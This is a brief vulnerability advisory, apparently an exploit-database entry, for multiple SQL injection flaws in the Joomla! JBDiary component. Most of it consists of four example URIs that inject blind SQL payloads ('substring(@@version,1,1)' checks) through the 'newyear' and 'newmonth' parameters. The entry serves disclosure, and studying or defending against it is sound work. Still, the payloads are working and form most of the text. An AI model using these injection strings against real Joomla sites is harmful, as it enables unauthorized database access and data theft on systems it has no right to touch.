Joomla! JBDiary Component Multiple SQL Injection Vulnerabilities

Joomla! JBDiary Component Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/?newyear=2011'+and+substring(@@version,1,1)=4%23&newmonth=01
http://www.example.com/?newyear=2011'+and+substring(@@version,1,1)=5%23&newmonth=01
http://www.example.com/?newyear=2011&newmonth=01'+and+substring(@@version,1,1)=4%23
http://www.example.com/?newyear=2011&newmonth=01'+and+substring(@@version,1,1)=5%23